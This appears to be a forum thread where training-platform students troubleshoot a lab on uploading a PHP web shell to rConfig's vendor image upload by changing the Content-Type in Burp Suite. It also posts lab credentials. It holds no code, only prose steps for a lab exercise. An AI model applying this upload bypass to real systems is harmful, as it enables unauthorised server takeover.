I’m stuck in the phpwebshell module, i cant go on at the answear
"Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif) ".
I follow all the steps described by the module, but I can’t load the webshell on the site, the steps I take are these
-I download the web shell
I unzip it and see the ‘webshell’ file
-now I go to the IP address that htb generated for me
I enter with my credentials
-go devices->vendor
-I open burpsuite and go to the proxy section
-I open the browser settings and in the proxy section I set 127.0.0.1 with port 8080
-I go to the web and add new
-I enter the credentials and using the browse button I find the .php file
-I save,
This is where the problems begin:
1, the page loads endlessly
2, burpsuite seems to have done its job but the web page never stops loading,
I don’t understand what the problem is, can someone tell me where I went wrong and what? can you give me some suggestions?
To be clear: Have you executed the transactions with the browser within burpsuite? After forwarding all your requests, you just need to upload the webshell and modify the Content Type of your web request in burpsuite as stated in the docs.
I’m stuck as well. I have been able to upload the php file and got the “Added new vendor NetVen to Database” message.
But when I go to https://target IP/images/vendor/connect.php, I get 404 Not Found.
Hi! I’m a little lost in this exercise. What credentials did you use to enter rConfig? HTB use to give us creds like: user “htb-student” and password “HTB_@cademy_stdnt!”
